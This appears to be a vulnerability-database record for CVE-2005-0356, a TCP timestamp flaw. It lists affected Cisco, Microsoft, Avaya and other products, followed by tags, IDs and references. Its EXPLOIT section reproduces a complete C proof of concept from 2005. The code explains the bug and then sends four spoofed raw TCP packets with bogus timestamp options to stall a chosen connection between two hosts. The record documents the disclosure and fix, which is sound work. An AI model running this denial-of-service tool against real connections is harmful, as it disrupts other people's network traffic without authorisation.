vendor: | cisco | model: | ciscoworks common services | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks common management foundation | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks common management foundation | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks common management foundation | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks cd1 5th edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks cd1 4th edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks cd1 3rd edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks cd1 2nd edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks cd1 1st edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks access control list manager | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks access control list manager | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks wireless lan solution engine | scope: | eq | version: | 1105 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks hosting solution engine | scope: | eq | version: | 1105 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.3(3) | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.1(2) | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | cisco | model: | call manager | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ap350 | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ap1200 | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | agent desktop | scope: | - | version: | - | Trust: 0.3 |
vendor: | blue | model: | coat systems sgos | scope: | - | version: | - | Trust: 0.3 |
vendor: | blue | model: | coat systems cacheos | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | intuity audix r5 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | avaya | model: | intuity audix | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | interactive response | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | avaya | model: | interactive response | scope: | eq | version: | 1.2.1 | Trust: 0.3 |
vendor: | avaya | model: | interactive response | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | cvlan | scope: | - | version: | - | Trust: 0.3 |
vendor: | alaxala | model: | networks ax7800s | scope: | - | version: | - | Trust: 0.3 |
vendor: | alaxala | model: | networks ax7800r | scope: | - | version: | - | Trust: 0.3 |
vendor: | alaxala | model: | networks ax5400s | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp tablet pc edition sp2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp professional sp2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp media center edition sp2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp home sp2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows server web edition sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server standard edition sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition itanium sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition itanium sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition sp1 | scope: | ne | version: | 2003 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | ne | version: | 9.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | ne | version: | 4.6.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | ne | version: | 4.5.13 | Trust: 0.3 |
vendor: | cisco | model: | pix os | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios xr | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | catos | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
/*
* TCP does not adequately validate segments before updating timestamp value
* http://www.kb.cert.org/vuls/id/637934
*
* RFC-1323 (TCP Extensions for High Performance)
*
* 4.2.1 defines how the PAWS algorithm should drop packets with invalid
* timestamp options:
*
* R1) If there is a Timestamps option in the arriving segment
* and SEG.TSval < TS.Recent and if TS.Recent is valid (see
* later discussion), then treat the arriving segment as not
* acceptable:
*
* Send an acknowledgement in reply as specified in
* RFC-793 page 69 and drop the segment.
*
* 3.4 defines what timestamp options to accept:
*
* (2) If Last.ACK.sent falls within the range of sequence numbers
* of an incoming segment:
*
* SEG.SEQ <= Last.ACK.sent < SEG.SEQ + SEG.LEN
*
* then the TSval from the segment is copied to TS.Recent;
* otherwise, the TSval is ignored.
*
* http://community.roxen.com/developers/idocs/drafts/
* draft-jacobson-tsvwg-1323bis-00.html
*
* 3.4 suggests an slightly different check like
*
* (2) If: SEG.TSval >= TSrecent and SEG.SEQ <= Last.ACK.sent
* then SEG.TSval is copied to TS.Recent; otherwise, it is
* ignored.
*
* and explains this change
*
* APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323
*
* There are additional changes in this document from RFC-1323.
* These changes are:
* (b) In RFC-1323, section 3.4, step (2) of the algorithm to control
* which timestamp is echoed was incorrect in two regards:
* (1) It failed to update TSrecent for a retransmitted segment
* that resulted from a lost ACK.
* (2) It failed if SEG.LEN = 0.
* In the new algorithm, the case of SEG.TSval = TSrecent is
* included for consistency with the PAWS test.
*
* At least OpenBSD and FreeBSD contain this code instead:
*
* sys/netinet/tcp_input.c tcp_input()
*
* **
* * If last ACK falls within this segment's sequence numbers,
* * record its timestamp.
* * NOTE that the test is modified according to the latest
* * proposal of the tcplw@cray.com list (Braden 1993/04/26).
* **
* if ((to.to_flags & TOF_TS) != 0 &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* tp->ts_recent_age = ticks;
* tp->ts_recent = to.to_tsval;
* }
*
* The problem here is that the packet the timestamp is accepted from doesn't
* need to have a valid th_seq or th_ack. This point of execution is reached
* for packets with arbitrary th_ack values and th_seq values of half the
* possible value range, because the first 'if (todrop > tlen)' check in the
* function explicitely continues execution to process ACKs.
*
* If an attacker knows (or guesses) the source and destination addresses and
* ports of a connection between two peers, he can send spoofed TCP packets
* to either peer containing bogus timestamp options. Since half of the
* possible th_seq and timestamp values are accepted, four packets containing
* two random values and their integer wraparound opposites are sufficient to
* get one random timestamp accepted by the receipient. Further packets from
* the real peer will get dropped by PAWS, and the TCP connection stalls and
* times out.
*
* The following change reverts the tcp_input() check back to the implemented
* suggested by draft-jacobson-tsvwg-1323bis-00.txt
*
* if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* + if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +
* + ((tiflags & (TH_SYN|TH_FIN)) != 0)))
* + tp->ts_recent = opti.ts_val;
* + else
* + tp->ts_recent = 0;
* tp->ts_recent_age = tcp_now;
* - tp->ts_recent = opti.ts_val;
* }
*
* I can't find Braden's proposal referenced in the comment. It seems to
* pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by
* it.
*
* Fri Mar 11 02:33:36 MET 2005 Daniel Hartmeier <daniel@benzedrine.cx>
*
* http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.184&r2=1.185&f=h
*
* http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.252.2.15&r2=1.252.2.16&f=h
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <net/if.h>
#ifdef __FreeBSD__
#include <net/if_var.h>
#endif
#include <netinet/in.h>
#include <netinet/in_var.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
static u_int16_t
checksum(u_int16_t *data, u_int16_t length)
{
u_int32_t value = 0;
u_int16_t i;
for (i = 0; i < (length >> 1); ++i)
value += data[i];
if ((length & 1) == 1)
value += (data[i] << 8);
value = (value & 65535) + (value >> 16);
return (~value);
}
static int
send_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,
u_int16_t dport, u_int32_t seq, u_int32_t ts)
{
u_char packet[1600];
struct tcphdr *tcp;
struct ip *ip;
unsigned char *opt;
int optlen, len, r;
struct sockaddr_in sin;
memset(packet, 0, sizeof(packet));
opt = packet + sizeof(struct ip) + sizeof(struct tcphdr);
optlen = 0;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_TIMESTAMP;
opt[optlen++] = 10;
ts = htonl(ts);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);
ts = htonl(0);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);
len = sizeof(struct ip) + sizeof(struct tcphdr) + optlen;
ip = (struct ip *)packet;
ip->ip_src.s_addr = saddr;
ip->ip_dst.s_addr = daddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_len = htons(sizeof(struct tcphdr) + optlen);
tcp = (struct tcphdr *)(packet + sizeof(struct ip));
tcp->th_sport = htons(sport);
tcp->th_dport = htons(dport);
tcp->th_seq = htonl(seq);
tcp->th_ack = 0;
tcp->th_off = (sizeof(struct tcphdr) + optlen) / 4;
tcp->th_flags = 0;
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;
tcp->th_sum = checksum((u_int16_t *)ip, len);
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = htons(len);
ip->ip_id = htons(arc4random() % 65536);
ip->ip_off = 0;
ip->ip_ttl = 64;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = saddr;
r = sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));
if (r != len) {
perror("sendto");
return (1);
}
return (0);
}
static u_int32_t
op(u_int32_t u)
{
return (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);
}
int main(int argc, char *argv[])
{
u_int32_t saddr, daddr, seq, ts;
u_int16_t sport, dport;
int sock, i;
if (argc != 5) {
fprintf(stderr, "usage: %s <src ip> <src port> "
"<dst ip> <dst port>\n", argv[0]);
return (1);
}
saddr = inet_addr(argv[1]);
daddr = inet_addr(argv[3]);
sport = atoi(argv[2]);
dport = atoi(argv[4]);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket");
return (1);
}
i = 1;
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1) {
perror("setsockopt");
close(sock);
return (1);
}
seq = arc4random();
ts = arc4random();
if (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||
send_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {
fprintf(stderr, "failed\n");
close(sock);
return (1);
}
close(sock);
printf("done\n");
return (0);
}
// milw0rm.com [2005-05-21]
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.0 |
tag: | tcp | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Daniel Hartmeier
Trust: 0.6
EXTERNAL IDS
db: | CERT/CC | id: | VU#637934 | Trust: 2.9 |
db: | NVD | id: | CVE-2005-0356 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 1008 | Trust: 1.6 |
db: | EDBNET | id: | 25489 | Trust: 0.6 |
db: | PACKETSTORM | id: | 37323 | Trust: 0.5 |
db: | PACKETSTORM | id: | 39291 | Trust: 0.5 |
db: | NVD | id: | CAN-2005-0356 | Trust: 0.3 |
db: | BID | id: | 13676 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2005-0356 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/1008/ | Trust: 0.6 |
url: | http://support.avaya.com/elmodocs2/security/asa-2005-148.pdf | Trust: 0.3 |
url: | http://www.ietf.org/rfc/rfc793.txt | Trust: 0.3 |
url: | http://www.microsoft.com/technet/security/advisory/899480.mspx | Trust: 0.3 |
url: | http://openbsd.org/errata36.html#tcp | Trust: 0.3 |
url: | http://www.alaxala.com/jp/support/icmp-20050518.html | Trust: 0.3 |
url: | http://www.bluecoat.com/support/knowledge/advisory_tcp_can-2005-0356.html | Trust: 0.3 |
url: | http://www.ietf.org/rfc/rfc1323.txt | Trust: 0.3 |
url: | http://www.rtpro.yamaha.co.jp/rt/faq/tcpip/vu637934.html | Trust: 0.3 |
url: | http://support.avaya.com/elmodocs2/security/asa-2006-032.htm | Trust: 0.3 |
url: | http://tech.f5.com/home/bigip-next/solutions/advisories/sol4743.html | Trust: 0.3 |
url: | http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/637934 | Trust: 0.3 |
url: | http://www.cisco.com/warp/public/707/cisco-sn-20050518-tcpts.shtml | Trust: 0.3 |
SOURCES
db: | BID | id: | 13676 |
db: | PACKETSTORM | id: | 37323 |
db: | PACKETSTORM | id: | 39291 |
db: | EXPLOIT-DB | id: | 1008 |
db: | EDBNET | id: | 25489 |
LAST UPDATE DATE
2022-07-27T09:46:31.181000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 13676 | date: | 2006-05-17T23:29:00 |
SOURCES RELEASE DATE
db: | BID | id: | 13676 | date: | 2005-05-18T00:00:00 |
db: | PACKETSTORM | id: | 37323 | date: | 2005-05-27T05:41:29 |
db: | PACKETSTORM | id: | 39291 | date: | 2005-08-14T07:28:11 |
db: | EXPLOIT-DB | id: | 1008 | date: | 2005-05-21T00:00:00 |
db: | EDBNET | id: | 25489 | date: | 2005-05-21T00:00:00 |